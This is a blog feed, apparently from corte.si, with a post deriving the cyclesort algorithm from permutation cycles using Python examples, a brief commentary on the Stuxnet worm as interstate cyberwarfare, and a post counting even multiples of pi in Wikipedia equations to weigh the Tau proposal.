https://corte.si/posts/code/cyclesort/ <p>One of the nice things about building <a rel="external" href="http://sortvis.org">sortvis.org</a> and writing the posts that led up to it is that people email me with pointers to esoteric algorithms I've never heard of. Today's post is dedicated to one of these - a curious little sorting algorithm called <a rel="external" href="http://en.wikipedia.org/wiki/Cycle_sort">cyclesort</a>. It was described in 1990 in a <a rel="external" href="http://comjnl.oxfordjournals.org/content/33/4/365.full.pdf">3-page paper by B.K. 
Haddon</a>, and has become a firm favourite of mine.</p> <p>Cyclesort has some nice properties - for certain restricted types of data it can do a stable, in-place sort in linear time, while guaranteeing that each element will be moved at most once. But what I really like about this algorithm is how naturally it arises from a simple theorem on <a rel="external" href="http://mathworld.wolfram.com/SymmetricGroup.html">symmetric groups</a>. Bear with me while I work up to the algorithm through a couple of basic concepts.</p> <h2 id="cycles">Cycles</h2> <p>Let's start with the definition of a <a rel="external" href="http://mathworld.wolfram.com/PermutationCycle.html">cycle</a>. A cycle is a subset of elements from a permutation that have been rotated from their original position. So, say we have an ordered set <strong>[0, 1, 2, 3, 4]</strong>, and a cycle <strong>[0, 3, 1]</strong>. The cycle defines a rotation where element 0 moves to position 3, 3 to 1 and 1 to 0. Visually, it looks like this:</p> <div class="media"> <a href="graph1.png"> <img src="graph1.png" /> </a> </div> <p>We can apply a cycle to an ordered set to obtain a permutation, and we can then reverse that cycle to re-obtain the original set. 
Here's a Python function that applies a cycle to a list in-place:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> apply_cycle</span><span>(lst, c):</span></span> <span class="giallo-l"><span style="color: #6A737D;"> # Extract the cycle&#39;s values</span></span> <span class="giallo-l"><span> vals</span><span style="color: #D73A49;"> =</span><span> [lst[i]</span><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span> c]</span></span> <span class="giallo-l"><span style="color: #6A737D;"> # Rotate them circularly by one position</span></span> <span class="giallo-l"><span> vals</span><span style="color: #D73A49;"> =</span><span> [vals[</span><span style="color: #D73A49;">-</span><span style="color: #005CC5;">1</span><span>]]</span><span style="color: #D73A49;"> +</span><span> vals[:</span><span style="color: #D73A49;">-</span><span style="color: #005CC5;">1</span><span>]</span></span> <span class="giallo-l"><span style="color: #6A737D;"> # Re-insert them into the list</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i, offset</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> enumerate</span><span>(c):</span></span> <span class="giallo-l"><span> lst[offset]</span><span style="color: #D73A49;"> =</span><span> vals[i]</span></span></code></pre> <p>Here's an interactive session showing the function in action:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> lst</span><span style="color: #D73A49;"> =</span><span> [</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: 
#005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 4</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> c</span><span style="color: #D73A49;"> =</span><span> [</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 1</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> apply_cycle(lst, c)</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> lst</span></span> <span class="giallo-l"><span>[</span><span style="color: #005CC5;">1</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 0</span><span>,</span><span style="color: #005CC5;"> 4</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> c.reverse()</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> apply_cycle(lst, c)</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> lst</span></span> <span class="giallo-l"><span>[</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 4</span><span>]</span></span></code></pre><h2 id="permutations">Permutations</h2> <p>Now, it's a fascinating fact that <strong>any permutation can be decomposed into a unique set of disjoint cycles</strong>. We can think of this as analogous to the factorization of a number - every permutation is the product of a unique set of component cycles in the same way every number is the product of a unique set of prime factors. 
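</p> <p>To make the "product of disjoint cycles" idea a little more concrete, here's a minimal sketch that builds a permutation by applying several disjoint cycles to an ordered list. It repeats <strong>apply_cycle</strong> from above so that it runs on its own; the <strong>apply_cycles</strong> helper is a name made up for this illustration. Because the cycles share no elements, the order in which they are applied makes no difference, and a cycle written from a different starting element (<strong>[3, 1, 0]</strong> rather than <strong>[0, 3, 1]</strong>) is still the same cycle - so "unique" here means unique up to those two freedoms.</p>

```python
def apply_cycle(lst, c):
    # Same behaviour as the apply_cycle function shown earlier in the post.
    vals = [lst[i] for i in c]
    vals = [vals[-1]] + vals[:-1]
    for i, offset in enumerate(c):
        lst[offset] = vals[i]


def apply_cycles(n, cycles):
    # Hypothetical helper (not from the original post): start from the
    # ordered list 0..n-1 and apply each disjoint cycle in turn.
    lst = list(range(n))
    for c in cycles:
        apply_cycle(lst, c)
    return lst


# Two disjoint cycles, applied in either order, give the same permutation.
a = apply_cycles(5, [[0, 3, 1], [2, 4]])
b = apply_cycles(5, [[2, 4], [0, 3, 1]])
print(a, b)

# The same cycle written from a different starting element.
print(apply_cycles(5, [[0, 3, 1]]), apply_cycles(5, [[3, 1, 0]]))
```

<p>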
Taking this as a given, how could we calculate the cycles that make up a permutation? One obvious way to proceed is to pick a starting point, and simply "follow" the cycle in reverse until we get back to where we started. We know from the result above that the element is guaranteed to be part of a cycle, so we must eventually reach our starting point again. When we do, hey presto, we have a complete cycle. If we keep track of the elements that are already part of a known cycle, we can skip to the next unknown element and repeat the process. Once we reach the end of the list we're done.</p> <p>This scheme can only work if we know where in the ordered sequence any given element belongs, because this is the way we find the "previous hop" in a cycle. In the examples above, we worked with lists that consist of a contiguous range of numbers <strong>0..n</strong>, which gives us a short-cut: the element's value <em>is</em> its offset in the ordered list. In the code below I've factored this out into a function <strong>key</strong>, which takes an element value, and returns its correct offset - in this case <strong>key</strong> is simply the identity function.</p> <p>Here's a Python function that finds all cycles in permutations of numbers ranging from <strong>0..n</strong>:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> element</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> find_cycles</span><span>(l):</span></span> <span class="giallo-l"><span> seen</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> set</span><span>()</span></span> <span class="giallo-l"><span> cycles</span><span style="color: 
#D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> !=</span><span> key(l[i])</span><span style="color: #D73A49;"> and not</span><span> i</span><span style="color: #D73A49;"> in</span><span> seen:</span></span> <span class="giallo-l"><span> cycle</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span style="color: #005CC5;"> 1</span><span>:</span></span> <span class="giallo-l"><span> cycle.append(n)</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> key(l[n])</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span></span> <span class="giallo-l"><span> seen</span><span style="color: #D73A49;"> =</span><span> seen.union(</span><span style="color: #005CC5;">set</span><span>(cycle))</span></span> <span class="giallo-l"><span> cycles.append(</span><span style="color: #005CC5;">list</span><span>(</span><span style="color: #005CC5;">reversed</span><span>(cycle)))</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> cycles</span></span></code></pre> <p>Running it on our example permutation produces the cycle we used to produce it:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> 
find_cycles([</span><span style="color: #005CC5;">1</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 2</span><span>,</span><span style="color: #005CC5;"> 0</span><span>,</span><span style="color: #005CC5;"> 4</span><span>])</span></span> <span class="giallo-l"><span>[[</span><span style="color: #005CC5;">3</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 0</span><span>]]</span></span></code></pre> <p>Here's <strong>find_cycles</strong> run on a longer, randomly shuffled list:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> l</span><span style="color: #D73A49;"> =</span><span> [</span><span style="color: #005CC5;">0</span><span>,</span><span style="color: #005CC5;"> 5</span><span>,</span><span style="color: #005CC5;"> 6</span><span>,</span><span style="color: #005CC5;"> 8</span><span>,</span><span style="color: #005CC5;"> 7</span><span>,</span><span style="color: #005CC5;"> 4</span><span>,</span><span style="color: #005CC5;"> 9</span><span>,</span><span style="color: #005CC5;"> 1</span><span>,</span><span style="color: #005CC5;"> 3</span><span>,</span><span style="color: #005CC5;"> 2</span><span>]</span></span> <span class="giallo-l"><span style="color: #D73A49;">&gt;&gt;&gt;</span><span> find_cycles(l)</span></span> <span class="giallo-l"><span>[[</span><span style="color: #005CC5;">7</span><span>,</span><span style="color: #005CC5;"> 4</span><span>,</span><span style="color: #005CC5;"> 5</span><span>,</span><span style="color: #005CC5;"> 1</span><span>], [</span><span style="color: #005CC5;">9</span><span>,</span><span style="color: #005CC5;"> 6</span><span>,</span><span style="color: #005CC5;"> 2</span><span>], [</span><span style="color: #005CC5;">8</span><span>,</span><span 
style="color: #005CC5;"> 3</span><span>]]</span></span></code></pre> <p>And here's a handsomely colourful graphical version of the output above:</p> <div class="media"> <a href="graph2.png"> <img src="graph2.png" /> </a> </div><h2 id="a-sorting-algorithm-emerges">A sorting algorithm emerges</h2> <p>Let's take a closer look at the <strong>find_cycles</strong> function above. We keep track of elements that are already part of a cycle in the <strong>seen</strong> set, so that we can skip them as we proceed through the list. The <strong>seen</strong> set can be as large as the list itself, so we've doubled the memory requirement for the algorithm. If we're allowed to destroy the input list, we can avoid explicitly tracking seen elements by relocating elements to their correct position as we work our way around each cycle. All the cycles are disjoint and we traverse each cycle only once, so doing this won't affect the function's output. We can then tell that we need to skip an element we've already seen by checking whether it's in the correct sorted position. 
Here's the result:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> element</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> find_cycles2</span><span>(l):</span></span> <span class="giallo-l"><span> cycles</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> !=</span><span> key(l[i]):</span></span> <span class="giallo-l"><span> cycle</span><span style="color: #D73A49;"> =</span><span> []</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span style="color: #005CC5;"> 1</span><span>:</span></span> <span class="giallo-l"><span> cycle.append(n)</span></span> <span class="giallo-l"><span> tmp</span><span style="color: #D73A49;"> =</span><span> l[n]</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> !=</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span> last_value</span><span style="color: #D73A49;"> =</span><span> tmp</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> key(last_value)</span></span> <span 
class="giallo-l"><span style="color: #D73A49;"> if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span> <span class="giallo-l"><span> l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span> <span class="giallo-l"><span style="color: #D73A49;"> break</span></span> <span class="giallo-l"><span> cycles.append(</span><span style="color: #005CC5;">list</span><span>(</span><span style="color: #005CC5;">reversed</span><span>(cycle)))</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> cycles</span></span></code></pre> <p>But... at the end of this process, the original list is sorted! Tada: cyclesort pops out of the shrubbery almost as a side-effect of efficiently finding all cycles. If we're only interested in sorting, we can strip the code that saves the cycles, which leaves us with a nice, pared-back sorting algorithm:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(element):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> return</span><span> element</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> cyclesort_simple</span><span>(l):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span> <span class="giallo-l"><span style="color: #D73A49;"> if</span><span> i</span><span style="color: #D73A49;"> !=</span><span> key(l[i]):</span></span> <span class="giallo-l"><span> n</span><span style="color: #D73A49;"> =</span><span> i</span></span> <span class="giallo-l"><span style="color: #D73A49;"> while</span><span 
style="color: #005CC5;"> 1</span><span>:</span></span>
<span class="giallo-l"><span>                tmp</span><span style="color: #D73A49;"> =</span><span> l[n]</span></span>
<span class="giallo-l"><span style="color: #D73A49;">                if</span><span> n</span><span style="color: #D73A49;"> !=</span><span> i:</span></span>
<span class="giallo-l"><span>                    l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span>
<span class="giallo-l"><span>                last_value</span><span style="color: #D73A49;"> =</span><span> tmp</span></span>
<span class="giallo-l"><span>                n</span><span style="color: #D73A49;"> =</span><span> key(last_value)</span></span>
<span class="giallo-l"><span style="color: #D73A49;">                if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span>
<span class="giallo-l"><span>                    l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span>
<span class="giallo-l"><span style="color: #D73A49;">                    break</span></span></code></pre> <p>The <strong>cyclesort_simple</strong> algorithm only works on permutations of the integers from <strong>0</strong> to <strong>n-1</strong>, where <strong>n</strong> is the length of the list, because each value doubles as its own target index. There are other fast ways to sort data of this restricted kind, but all the methods I know of require additional memory proportional to <strong>n</strong>. Cyclesort can do it without any extra storage at all, which is a neat trick.</p> <h2 id="visualising-cyclesort">Visualising cyclesort</h2> <p>At this point, we have enough information to visualise the algorithm, so let's take a look at the beastie we're working with. I've had to make some little adjustments to the usual sortvis.org visualisation process to cope with cyclesort. In the algorithm above, the first element is duplicated into the second position of each cycle, and that duplicate remains in play until it's overwritten by the last element of the cycle. 
I changed the algorithm slightly to write a null placeholder at the start of the cycle to avoid duplicates, and taught the sortvis.org visualiser to deal with "empty" slots. The resulting <a rel="external" href="http://sortvis.org/visualisations.html">weave</a> visualisation looks like this:</p> <div class="media"> <a href="cyclesort.png"> <img src="cyclesort.png" /> </a> </div> <p>This is quite satisfying - you can tell where each cycle begins and ends by the gaps, which span each cycle exactly. It's immediately clear that the permutation above, for instance, contained five cycles. Within each cycle, you can follow along as each element replaces the next, until we finally close the gap by placing the last element in the first slot.</p> <p>The <a rel="external" href="http://sortvis.org/visualisations.html">dense</a> visualisation is less informative because the gaps are too small to see at a single-pixel width, and the algorithm doesn't have much other large-scale structure. It still looks neat, though:</p> <div class="media"> <a href="cyclesort-dense.png"> <img src="cyclesort-dense.png" /> </a> </div><h2 id="generalising-cyclesort">Generalising cyclesort</h2> <p>Cyclesort works whenever we can write an implementation of the <strong>key</strong> function, so there's quite a bit of scope for clever exploitation of structured data. The Haddon paper presents a solution for one common case: permutations whose elements come from a relatively small set, where the number of occurrences of each element is known. 
The insight is that the <strong>key</strong> function can have persistent state, letting us calculate the positions of elements incrementally as we work through the list.</p> <p>We begin by adding an extra argument to our sort function: a list of <strong>(element, count)</strong> tuples telling us a) the order of the keys, and b) the frequency with which each key occurs.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span>[(</span><span style="color: #032F62;">&quot;a&quot;</span><span>,</span><span style="color: #005CC5;"> 10</span><span>), (</span><span style="color: #032F62;">&quot;b&quot;</span><span>,</span><span style="color: #005CC5;"> 33</span><span>), (</span><span style="color: #032F62;">&quot;c&quot;</span><span>,</span><span style="color: #005CC5;"> 18</span><span>), (</span><span style="color: #032F62;">&quot;d&quot;</span><span>,</span><span style="color: #005CC5;"> 41</span><span>)]</span></span></code></pre> <p>Now, in the sorted list, we know that there will be a contiguous block of 10 "a"s, followed by a contiguous block of 33 "b"s, and so forth. 
We can use this information to calculate the offset of each contiguous block up front:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> offsets</span><span>(keys):</span></span>
<span class="giallo-l"><span>    d</span><span style="color: #D73A49;"> =</span><span> {}</span></span>
<span class="giallo-l"><span>    offset</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 0</span></span>
<span class="giallo-l"><span style="color: #D73A49;">    for</span><span> key, occurences</span><span style="color: #D73A49;"> in</span><span> keys:</span></span>
<span class="giallo-l"><span>        d[key]</span><span style="color: #D73A49;"> =</span><span> offset</span></span>
<span class="giallo-l"><span>        offset</span><span style="color: #D73A49;"> +=</span><span> occurences</span></span>
<span class="giallo-l"><span style="color: #D73A49;">    return</span><span> d</span></span></code></pre> <p>The <strong>key</strong> function uses this offset dictionary to look up the current target index for any element. Each time we insert an element into position, we increment the relevant offset entry - next time we get to an element of the same type, we will place it in the next position in the contiguous block. We also make a small modification to the algorithm to cater for the progressive position increment process: we start a cycle only when the element's current index is equal to or above the position where it ought to be. Elements sitting below their target position are skipped, because a later cycle will displace them. 
Here's a Python implementation:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="python"><span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> offsets</span><span>(keys):</span></span>
<span class="giallo-l"><span>    d</span><span style="color: #D73A49;"> =</span><span> {}</span></span>
<span class="giallo-l"><span>    offset</span><span style="color: #D73A49;"> =</span><span style="color: #005CC5;"> 0</span></span>
<span class="giallo-l"><span style="color: #D73A49;">    for</span><span> key, occurences</span><span style="color: #D73A49;"> in</span><span> keys:</span></span>
<span class="giallo-l"><span>        d[key]</span><span style="color: #D73A49;"> =</span><span> offset</span></span>
<span class="giallo-l"><span>        offset</span><span style="color: #D73A49;"> +=</span><span> occurences</span></span>
<span class="giallo-l"><span style="color: #D73A49;">    return</span><span> d</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> key</span><span>(o, element):</span></span>
<span class="giallo-l"><span style="color: #D73A49;">    return</span><span> o[element]</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span style="color: #D73A49;">def</span><span style="color: #6F42C1;"> cyclesort_general</span><span>(l, keys):</span></span>
<span class="giallo-l"><span>    o</span><span style="color: #D73A49;"> =</span><span> offsets(keys)</span></span>
<span class="giallo-l"><span style="color: #D73A49;">    for</span><span> i</span><span style="color: #D73A49;"> in</span><span style="color: #005CC5;"> range</span><span>(</span><span style="color: #005CC5;">len</span><span>(l)):</span></span>
<span class="giallo-l"><span style="color: #D73A49;">        if</span><span> i</span><span style="color: #D73A49;"> &gt;=</span><span> key(o, l[i]):</span></span>
<span 
class="giallo-l"><span>            n</span><span style="color: #D73A49;"> =</span><span> i</span></span>
<span class="giallo-l"><span style="color: #D73A49;">            while</span><span style="color: #005CC5;"> 1</span><span>:</span></span>
<span class="giallo-l"><span>                tmp</span><span style="color: #D73A49;"> =</span><span> l[n]</span></span>
<span class="giallo-l"><span style="color: #D73A49;">                if</span><span> n</span><span style="color: #D73A49;"> !=</span><span> i:</span></span>
<span class="giallo-l"><span>                    l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span>
<span class="giallo-l"><span>                last_value</span><span style="color: #D73A49;"> =</span><span> tmp</span></span>
<span class="giallo-l"><span>                n</span><span style="color: #D73A49;"> =</span><span> key(o, last_value)</span></span>
<span class="giallo-l"><span>                o[last_value]</span><span style="color: #D73A49;"> +=</span><span style="color: #005CC5;"> 1</span></span>
<span class="giallo-l"><span style="color: #D73A49;">                if</span><span> n</span><span style="color: #D73A49;"> ==</span><span> i:</span></span>
<span class="giallo-l"><span>                    l[n]</span><span style="color: #D73A49;"> =</span><span> last_value</span></span>
<span class="giallo-l"><span style="color: #D73A49;">                    break</span></span></code></pre> <p>This algorithm runs in <strong>O(n + m)</strong>, where <strong>n</strong> is the number of elements and <strong>m</strong> is the number of distinct element values. In practice <strong>m</strong> is usually small, so this is often tantamount to being <strong>O(n)</strong>.</p> <h2 id="the-code">The code</h2> <p>As usual, the code for these visualisations has been incorporated into the <a rel="external" href="https://github.com/cortesi/sortvis">sortvis project</a>. 
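</p> <p>To make the calling convention of the generalised sort concrete, here is a minimal usage sketch. It restates <strong>cyclesort_general</strong> in compact form so that it runs on its own. Building the key list with <strong>collections.Counter</strong> is an assumption made purely for the demo (it uses extra memory, which the algorithm itself does not need), and the sample data is made up.</p>

```python
from collections import Counter


def cyclesort_general(l, keys):
    """Compact restatement of the generalised sort above; sorts l in place."""
    # Starting offset of each key's contiguous block in the sorted list.
    o, offset = {}, 0
    for k, count in keys:
        o[k] = offset
        offset += count
    for i in range(len(l)):
        # Start a cycle only if the element sits at or above its target slot.
        if i >= o[l[i]]:
            n = i
            while True:
                tmp = l[n]
                if n != i:
                    l[n] = last_value
                last_value = tmp
                n = o[last_value]      # next free slot in this key's block
                o[last_value] += 1
                if n == i:
                    l[n] = last_value  # close the cycle
                    break


# Hypothetical sample data, not taken from the post.
data = list("dbacabdc")
# Assumption: keys are listed in the desired sort order with exact counts.
keys = sorted(Counter(data).items())
cyclesort_general(data, keys)
print("".join(data))  # prints aabbccdd
```

<p>The only requirement on the caller is that the counts are exact: if they do not match the data, the offsets point at the wrong slots and the cycles no longer close properly.</p> <p>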
I've also added the visualisations above to the <a rel="external" href="http://sortvis.org">sortvis.org</a> website.</p> What Stuxnet means 2010-11-15T00:00:00+00:00 2010-11-15T00:00:00+00:00 https://corte.si/posts/security/stuxnet/ <p><a rel="external" href="http://www.symantec.com/connect/blogs/stuxnet-breakthrough">The last bit of evidence is now in</a> - it appears that the mysterious <a rel="external" href="http://en.wikipedia.org/wiki/Stuxnet">Stuxnet</a> worm was indeed aimed at Iran's nuclear capability. This means that we now know for sure that Stuxnet was an event of great significance - the first example of a type of sophisticated interstate warfare that we can expect to see a lot more of in future. It neatly ties together a number of trends that we've been talking about to clients at <a rel="external" href="http://www.nullcube.com">Nullcube</a> for years:</p> <ul> <li><strong>The worm as a targeted delivery platform.</strong> Stuxnet spread indiscriminately, waiting until it infected its intended target before springing into action. This is a marvelous delivery platform with excellent deniability. When executed with flair - using multiple previously unknown vulnerabilities, spreading through both physical media and networks - it can be incredibly hard to defend against. Look for a Stuxnet-like worm that exfiltrates data from targeted systems next.</li> <li><strong>Internet security is a national concern.</strong> There's a tendency to view the Internet as an internationally homogeneous network. Stuxnet makes it (even more) clear that the Internet is a domain for contest between nation states, and that national differences in security readiness and technology populations matter. Look for more direct government involvement in tracking and improving the security of local networks. 
I suspect we'll also see the rise of national perimeter defenses in some countries in the next few years.</li> <li><strong>Embedded systems are a target.</strong> Embedded systems are everywhere, are often ignored when security is considered, and are opaque, difficult to inspect, and difficult to monitor. This is a malware nirvana. Whether they are directly or indirectly connected to a network, embedded systems are a target. My prediction: soon, we'll see a Stuxnet-like worm that spreads directly from embedded system to embedded system, most likely affecting DSL modems. In fact, we've already seen a clumsy precursor of this in <a rel="external" href="http://en.wikipedia.org/wiki/Psyb0t">Psyb0t</a>, discovered at the beginning of 2009.</li> </ul> <p>There's a lot about this incident that we will most likely never know. We're unlikely to find out who's behind Stuxnet (although Israel and the US seem to be the only real possibilities). We're unlikely to find out if Stuxnet ever repaid the immense technological capital its creators invested. But we do know that it's a sign of things to come.</p> Tau: is it worth switching? 2010-10-04T00:00:00+00:00 2010-10-04T00:00:00+00:00 https://corte.si/posts/maths/tau/ <p>The mailing list for my <a rel="external" href="http://dunedin.linux.net.nz/Main/HomePage">local LUG</a> recently had a small flurry of posts on <a rel="external" href="http://www.tauday.com/">The Tau Manifesto</a>, a proposal to replace the constant π with τ, equal to 2π. Pro- and anti- camps quickly emerged, and much beer will likely be spilt over the issue at our next meeting.</p> <p>Disregarding for the moment any conceptual elegance or explanatory power that Tau might have, I was interested to know if the move would really reduce redundancy in common mathematical expressions. 
Let's say (rather arbitrarily) that Tau simplifies a mathematical expression whenever π is preceded by an even constant - that means that 2π becomes τ, and 4π becomes 2τ, and so forth. I had a vague intuition that the majority of occurrences of π in the wild fell into this category, which might indicate that τ is a more natural (or at least parsimonious) constant to use. Was my hunch right? This, I felt, was something I could quantify.</p> <h2 id="methodology">Methodology</h2> <p>I wrote a small script to crawl all the articles linked to from the Wikipedia <a rel="external" href="http://en.wikipedia.org/wiki/List_of_equations">List of Equations</a> page. For each page, I extracted all mathematical expressions, and checked the LaTeX source of each for occurrences of the symbol π. A little bit of light parsing was then done to check if the symbol was directly preceded by an integer constant. Finally, I rendered the LaTeX source back to images to produce the equation tables below.</p> <p>Of course, anyone of sound judgement will disregard what follows entirely, due to the many obvious shortcomings of this procedure and its underlying assumptions. Readers of my blog, on the other hand, may find the results interesting.</p> <h2 id="results">Results</h2> <p>I found a total of 3173 equations, of which 133 contained the symbol π. Of these 133 equations, the distribution of constant factors preceding π looked like this:</p> <div class="media"> <a href="taugraph.png"> <img src="taugraph.png" /> </a> </div> <p>I call this a straight win for Tau - the vast majority of expressions using π (119 of 133) are preceded by even integer constants.</p> <h2 id="equations">Equations</h2> <p>Below are all the expressions that included π, plus the detected constant factor. 
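</p> <p>The constant-detection step from the methodology can be sketched roughly as follows. This is not the script that produced the tables, just a minimal illustration of the idea: the regular expression and the names <strong>pi_factors</strong> and <strong>classify</strong> are hypothetical, and the sketch only looks for digits directly in front of <strong>\pi</strong> in the LaTeX source.</p>

```python
import re

# Hypothetical pattern: an optional run of digits, optional whitespace, then \pi.
# The negative lookahead keeps \pi from matching inside longer macros
# such as \pitchfork.
PI_PATTERN = re.compile(r"(\d+)?\s*\\pi(?![A-Za-z])")


def pi_factors(latex):
    """Return the integer factor before each \\pi in a LaTeX string.

    An occurrence with no integer directly before it yields None.
    """
    return [int(m.group(1)) if m.group(1) else None
            for m in PI_PATTERN.finditer(latex)]


def classify(factor):
    """Bucket a factor the way the tables do: even, odd, or none."""
    if factor is None:
        return "none"
    return "even" if factor % 2 == 0 else "odd"


# Two hand-written sample expressions (not taken from the crawl).
for source in (r"\frac{8\pi G}{c^4}", r"e^{i\pi} + 1 = 0"):
    for factor in pi_factors(source):
        print(source, factor, classify(factor))
```

<p>A parser this light is easy to fool: an exponent written directly before π, for instance, would be misread as a constant factor. That is one of the shortcomings the caveat in the methodology has in mind.</p> <p>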
The headings point to the Wikipedia pages from which the equations were taken.</p> <p>If nothing else, this list is a nice reminder of the mysterious ubiquity of a constant involving the diameter and circumference of a circle in all aspects of physics and higher math.</p> <h2><a href="http://en.wikipedia.org/wiki/Relativistic_wave_equations">Relativistic wave equations</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">8</td> <td> <img src="1.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Sine-Gordon_equation">Sine-Gordon equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="2.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="3.png"/> </td> </tr> </table> <h2><a href="http://en.wikipedia.org/wiki/Fokker%E2%80%93Planck_equation">Fokker–Planck equation</a></h2> <table> <th>constant</th> <th>expression</th> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="4.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="5.png"/> </td> </tr> <tr> <td style="text-align: center;" class="factor_even">2</td> <td> <img src="6.png"/> 